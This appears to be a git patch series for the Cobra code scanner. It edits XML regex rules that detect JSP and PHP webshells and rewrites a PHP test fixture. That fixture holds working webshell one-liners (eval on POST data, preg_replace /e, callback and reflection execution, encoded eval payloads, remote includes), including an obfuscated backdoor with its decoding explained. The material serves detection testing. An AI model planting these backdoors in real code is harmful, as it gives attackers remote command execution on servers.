a/rules/CVI-360038.xml b/rules/CVI-360038.xml deleted file mode 100644 index deff809e..00000000 --- a/rules/CVI-360038.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="browse_file"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (\.(listFiles|list|listRoots)\s*\(.+\.(readLine|read)\s*\(.+\.write\s*\()|(\.(readLine|read)\s*\(.+\.write\s*\(.+\.(listFiles|list|listRoots)\s*\() - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360039.xml b/rules/CVI-360039.xml deleted file mode 100644 index 48b4e716..00000000 --- a/rules/CVI-360039.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="create_file"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.io\.)?(FileOutputStream|PrintWriter|FileWriter|RandomAccessFile)\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360040.xml b/rules/CVI-360040.xml deleted file mode 100644 index f73abc12..00000000 --- a/rules/CVI-360040.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="upload_file"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*((java\.io\.)?ServletFileUpload|(com\.jspsmart\.upload\.)?SmartUpload)\(\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360041.xml b/rules/CVI-360041.xml deleted file mode 100644 index 00812f9b..00000000 --- a/rules/CVI-360041.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="net_socket"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.net\.)?ServerSocket\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360042.xml b/rules/CVI-360042.xml deleted file mode 100644 index 3ee29f02..00000000 --- a/rules/CVI-360042.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="net_socket2"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.net\.)?Socket\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360043.xml b/rules/CVI-360043.xml deleted file mode 100644 index 2e268ba3..00000000 --- a/rules/CVI-360043.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="net_socket3"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.net\.)?InetSocketAddress\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360044.xml b/rules/CVI-360044.xml deleted file mode 100644 index 93d4bb95..00000000 --- a/rules/CVI-360044.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="http_connect"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (\w+)\s*=\s*new\s*(java\.net\.)?URL\(.*?\)[\s\S]*\1\.openConnection\(\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360045.xml b/rules/CVI-360045.xml deleted file mode 100644 index 0932aee9..00000000 --- a/rules/CVI-360045.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_command"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - Runtime\.getRuntime\(\)\.exec - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360046.xml b/rules/CVI-360046.xml deleted file mode 100644 index 80b1b060..00000000 --- a/rules/CVI-360046.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_unicode"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (\\u00\w\w){3,} - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360047.xml b/rules/CVI-360047.xml deleted file mode 100644 index 71e740ad..00000000 --- a/rules/CVI-360047.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_class_invoke"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - \.getMethod\(.*?\.invoke - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360048.xml b/rules/CVI-360048.xml deleted file mode 100644 index 4eb69f9a..00000000 --- a/rules/CVI-360048.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_class_invoke2"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (?:(?:java\.lang\.reflect\.)?Method)?\s*(\w+)\s*=\s*.*\.getMethod\([\s\S]*\1\.invoke\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360049.xml b/rules/CVI-360049.xml deleted file mode 100644 index 22bcc137..00000000 --- a/rules/CVI-360049.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_url_loader"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - java\.net\.URLClassLoader - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360050.xml b/rules/CVI-360050.xml deleted file mode 100644 index 8ec8f236..00000000 --- a/rules/CVI-360050.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="sql_connect"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (java\.sql\.)?DriverManager\.(getConnection|registerDriver)\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360051.xml b/rules/CVI-360051.xml deleted file mode 100644 index b7bbdca2..00000000 --- a/rules/CVI-360051.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="sql_query"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (ResultSet)?\s*\w+\s*=\s*\w+\.executeQuery\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360052.xml b/rules/CVI-360052.xml deleted file mode 100644 index 9f41b62b..00000000 --- a/rules/CVI-360052.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="jdbc_drivers"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - COM\.ibm\.db2\.jdbc\.app\.DB2Driver|COM\.ibm\.db2\.jdbc\.DB2XADataSource|COM\.ibm\.db2\.jdbc\.net\.DB2Driver|com\.informix\.jdbc\.IfxDriver|com\.informix\.jdbcx\.IfxXADataSource|org\.apache\.derby\.jdbc\.ClientDriver|com\.microsoft\.sqlserver\.jdbc\.SQLServerDriver|com\.microsoft\.jdbc\.sqlserver\.SQLServerDriver|com\.mysql\.jdbc\.Driver|org\.gjt\.mm\.mysql\.Driver|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|com\.tongweb\.jdbc\.OracleDriverWrapper|org\.postgresql\.Driver|com\.sybase\.jdbc\.SybDriver|com\.sybase\.jdbc2\.jdbc\.SybXADataSource|org\.hsqldb\.jdbcDriver|com\.sybase\.jdbc3\.jdbc\.SybDriver|com\.kingbase\.Driver|dm\.jdbc\.driver\.DmDriver - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index 3f77d873..5e597b1d 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -64,6 +64,9 @@ function curl($url){ if(!empty($cmd)){ require_once($cmd); + + // 这种扫不出来 + require $cmd; } highlight_file($cmd); @@ -117,6 +120,7 @@ function GetFile($host,$port,$link) $out = "GET $link HTTP/1.1\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n\r\n"; + $out .= "Connection: Close\r\n\r\n"; $out .= "\r\n"; fwrite($fp, $out); $contents=''; @@ -138,4 +142,4 @@ function GetFile($host,$port,$link) $redis = new Redis(); $redis->connect('192.168.1.2', 6379); -$redis->auth('passwd123!#'); +$redis->auth('passwd123!#'); \ No newline at end of file diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index c6802f03..beea16b8 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -1,41 +1,41 @@ -<?php -//cvi-360001 -eval($_POST['C']); + //cvi-360002 -$a="ss"; -include("sss.jpg"); +include "sss.jpg"; +include("sss_tmp"); +require_once "http://www.test.com/sss.php"; + +//扫不出来.... +$a="http://www.test.com/sss.php"; +require_once $a; -//cvi-360003 -echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a); +///////////// //cvi-360004 $string = 'AABBCCDDEE'; preg_replace($_POST['A'], $_POST['B'], $string); - $user =$_GET['user'];preg_replace(chr(101),exec('whoami'),"aaaa"); $b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'; - //cvi-360006 换行就挂 $b = $_POST['B']; preg_replace($_POST['A'], $b, $string); +///////////// + //cvi-360007 -array_map("ass\x65rt",(array)$_REQUEST['expdoor']); +$func = new ReflectionFunction($_GET[m]); +echo $func->invokeArgs(array($_GET[c],$_GET[id])); + + //cvi-360008 //cvi-360009 -$e = $_REQUEST['e']; -$arr = array($_POST['pass'],); -array_filter($arr, base64_decode($e)); +$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); -//cvi-360010 换行就挂 -$e = $_REQUEST['e']; -$arr = array($_POST['pass'],); -array_filter($arr, base64_decode($e)); +$ee = "eval()";array_filter($a, base64_decode($ee)); //cvi-360011 换行就挂 $newfunc = create_function(null,'assert($cmd);');$newfunc(); @@ -48,7 +48,8 @@ $fun = $_POST['fun'];$ newfunc = create_function('str',$fun); //cvi-360014 换行就挂的那种 -$a=$_GET['A'];$a($_GET['B']); +$a="eval(";$a($_GET['a']); + //cvi-360015 if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { @@ -58,70 +59,95 @@ exit; } -//cvi-360016 -$string = "hello cobra"; -filter_var($string, FILTER_CALLBACK,eval($cmd)); +//cvi-360016 +filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); //cvi-360017 换行挂 -$string = "hello cobra"; -$func=$_POST['func'];filter_var($string, FILTER_CALLBACK,$func); +$op=array('options' => 'assert'); +filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); -//cvi-360018??????? -$data = mb_ereg_replace("[^A-Za-z0-9\.\-]","$_POST['replacement']",$data); - - -//cvi-360019??????? -$replacement=$_POST['replacement'];$data = mb_ereg_replace("[^A-Za-z0-9\.\-]",$replacement,$data); +//cvi-360018 一句话 +mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); +//cvi-360019 换行挂 +$e = "\ise"; +$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); //cvi-360020 array_walk($array,$_POST['func']); //cvi-360021 换行挂 -$func=$_POST['func'];array_walk($array,$func); + //cvi-360022 -eval(file_get_contents("php://input")) +ini_set('allow_url_include, 1'); // Allow url inclusion in this script +include('php://input'); //cvi-360023 特征值 GIF87a<?php BM<?php -//cvi-360024 +//cvi-360024 这什么玩意 $f=$c('',$d);$f(); -//cvi-360025 -$a=str_replace($bb=$cc);$a();$bb(); -$a=str_replace("$cc=$dd","Shanghai","Hello world!");$a();$cc(); +//cvi-360025 mdzz匹配不上 +$k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); + + +$mt="mFsKCleRfU"; +$ojj="IEBleldle"; +$hsa="E9TVFsnd2VuJ10p"; +$fnx="Ow=="; +$zk = str_replace("d","","sdtdrd_redpdldadcde"); +$ef = $zk("z", "", "zbazsze64_zdzeczodze"); +$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); +$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); +//分解步骤 +//$zvm=create_function(base64_decode(str_replace("le","","IEBleldlemFsKCleRfUE9TVFsnd2VuJ10pOw=="))) //拼接后的语句 +//$zvm=create_function(base64_decode(IEBldmFsKCRfUE9TVFsnd2VuJ10pOw==))) //执行完str_replace函数后,返回base64加密后的字符串 +//$zvm=create_function(@eval($_POST['wen'])); //执行完base64_decode 得到解密后的字符串 得到一句话木马 密码是wen +$zvm(); //执行 + + +//cvi-360026 这个怎么用啊 +$cb= 'system'; +ob_start($cb); +echo $_GET[c]; +ob_end_flush(); + +$evalstr=""; +ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); +echo $_REQUEST['pass']; +ob_end_flush(); +assert($evalstr); + +ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); +echo $_REQUEST['pass']; +ob_end_flush(); -//cvi-360026 -ob_start("eval($cmd)"); //cvi-360027 -eval(php://input); +//找不到栗子 + +//cvi-360028 一句话 +eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); +eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); -//cvi-360028 特征值 -eval("?>". -cat /etc/passwd -//cvi-360029 特征值 -$bind_pl="IyEvdXNyL2Jpbi9lbnYgcGV"; +//cvi-360034 一句话 +$_POST['sa']($_POST['sb']); +$_POST['sa']($_POST['sb'],$_POST['sc']); -//cvi-360030 特征值 -$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2 +$sa = $_POST['sa']; +$sa($_POST['sb']); -//cvi-360031 特征值 -if(file_exists($settings['STOPFILE'])){$a="hello"} +$sa = $_POST['sa']; +$sb = $_POST['sb']; +$sa($sb); -//cvi-360032 特征值 -b374k; -c999shexit(); +$sa = $_POST['sa']; +$_POST($sa ); -//cvi-360033 特征值 -$OOO000000=urldecode; -1MSSYowqjzlVVAwAoHHFXzQ5Lc; -//cvi-360034 360014 -$a=$_GET['A']; $a($_GET['B']); ?> From 1533d3f5948eceb9d13589acbfea26647706f7f6 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 11:34:00 +0800 Subject: [PATCH 18/29] Merge branch 'master' of github.com:braveghz/cobra # Conflicts: # rules/CVI-220001.xml # rules/CVI-360004.xml # rules/CVI-360005.xml # rules/CVI-360007.xml # rules/CVI-360012.xml # rules/CVI-360020.xml # rules/CVI-360021.xml # tests/vulnerabilities/webshell.php --- docs/index.md | 3 +- docs/labels.md | 1 + rules/CVI-360001.xml | 21 ++++ rules/CVI-360002.xml | 19 ++++ rules/CVI-360003.xml | 19 ++++ rules/CVI-360004.xml | 5 +- rules/CVI-360005.xml | 1 + rules/CVI-360006.xml | 19 ++++ rules/CVI-360007.xml | 10 +- rules/CVI-360008.xml | 22 +++++ rules/CVI-360009.xml | 22 +++++ rules/CVI-360010.xml | 13 ++- rules/CVI-360037.xml | 22 +++++ tests/vulnerabilities/webshell.php | 150 ----------------------------- 14 files changed, 161 insertions(+), 166 deletions(-) create mode 100644 rules/CVI-360001.xml create mode 100644 rules/CVI-360002.xml create mode 100644 rules/CVI-360003.xml create mode 100644 rules/CVI-360006.xml create mode 100644 rules/CVI-360008.xml create mode 100644 rules/CVI-360009.xml create mode 100644 rules/CVI-360037.xml delete mode 100644 tests/vulnerabilities/webshell.php diff --git a/docs/index.md b/docs/index.md index dd793f80..4f1e822b 100644 --- a/docs/index.md +++ b/docs/index.md @@ -48,7 +48,8 @@ | 290 | LB | Logic Bug | 逻辑错误 | | 320 | VO | Variables Override | 变量覆盖漏洞 | | 350 | WF | Weak Function | 不安全的函数 | -| 355 | WE |Weak Encryption | 不安全的加密 | +| 355 | WE | Weak Encryption | 不安全的加密 | +| 360 | WS | WebShell | WebShell | | 970 | AV | Android Vulnerabilities | Android漏洞 | | 980 | IV | iOS Vulnerabilities | iOS漏洞 | | 999 | IC | Insecure Components| 引用了存在漏洞的三方组件(Maven/Pods/PIP/NPM) | diff --git a/docs/labels.md b/docs/labels.md index ac3216ae..4f481680 100644 --- a/docs/labels.md +++ b/docs/labels.md @@ -26,6 +26,7 @@ | 320 | VO | Variables Override | 变量覆盖漏洞 | | 350 | WF | Weak Function | 不安全的函数 | | 355 | WE |Weak Encryption | 不安全的加密 | +| 360 | WS | WebShell | WebShell | | 970 | AV | Android Vulnerabilities | Android漏洞 | | 980 | IV | iOS Vulnerabilities | iOS漏洞 | | 999 | IC | Insecure Components| 引用了存在漏洞的三方组件(Maven/Pods/PIP/NPM) | diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml new file mode 100644 index 00000000..afdb2aec --- /dev/null +++ b/rules/CVI-360001.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell1"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[include "sss.jpg";]]></case> + <case assert="true"><![CDATA[include("sss_tmp");]]></case> + <case assert="true"><![CDATA[require_once "http://www.test.com/sss.php";]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml new file mode 100644 index 00000000..2544dfde --- /dev/null +++ b/rules/CVI-360002.xml @@ -0,0 +1,19 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell2"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)\s*\(+\s*.{1,100}),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(].{1,25})\s*\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[array_filter($arr, base64_decode("ZXZhbA=="));]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml new file mode 100644 index 00000000..f3cc59f4 --- /dev/null +++ b/rules/CVI-360003.xml @@ -0,0 +1,19 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell3"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*\$\s*(\w+)\s*=[\s\(\{]*['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\x|[^,;]*?['\"]\s*\.\s*['\"])[\s\S]{0,1000}(array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)\s*\(+\s*.{1,100},\s*(\$\s*\1\s*\))]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[$e = "eval";array_filter($arr, $e);]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360004.xml b/rules/CVI-360004.xml index 046a05cd..57f5a512 100644 --- a/rules/CVI-360004.xml +++ b/rules/CVI-360004.xml @@ -5,10 +5,7 @@ <match mode="regex-only-match"><![CDATA[(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,\s*([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25})))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[ - $string = 'AABBCCDDEE'; - preg_replace($_POST['A'], $_POST['B'], $string); - ]]></case> + <case assert="true"><![CDATA[echo @preg_replace('/xx/e', $_POST[sss],axxa);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360005.xml b/rules/CVI-360005.xml index 45ef2e8e..4b1f8e7e 100644 --- a/rules/CVI-360005.xml +++ b/rules/CVI-360005.xml @@ -5,6 +5,7 @@ <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\|[^\|]*\||\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)]]></match> <level value="7"/> <test> + <case assert="true"><![CDATA[($e = $_POST['e']) && @preg_replace($e, "eval", 'hello');]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360006.xml b/rules/CVI-360006.xml new file mode 100644 index 00000000..6ee6b053 --- /dev/null +++ b/rules/CVI-360006.xml @@ -0,0 +1,19 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell6"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[.*\s*\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*.*\$\1)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[($code = $_POST['code']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add');]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 1608f370..62b8cea4 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml @@ -1,19 +1,15 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="PHP反射后门"/> + <name value="webshell7"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[(new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\)))]]></match> + <match mode="regex-only-match"><![CDATA[(array_map|call_user_func|call_user_func_array|register_shutdown_function|register_tick_function)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\x).{0,200})]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[ - $func = new ReflectionFunction($_GET[m]); - echo $func->invokeArgs(array($_GET[c],$_GET[id])); - ]]></case> + <case assert="true"><![CDATA[call_user_func('assert', $arr);]]></case> </test> <solution> ## 安全风险 代码中存在webshell - [webshell样例 链接](https://github.com/tennc/webshell/blob/master/php/p2j/PHP%20reflection.php.txt) ## 修复方案 删除 diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml new file mode 100644 index 00000000..2524f03a --- /dev/null +++ b/rules/CVI-360008.xml @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell8"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(array_map|call_user_func|call_user_func_array|register_shutdown_function|register_tick_function)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\)]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a = 'assert'; + call_user_func($a, $arr); + 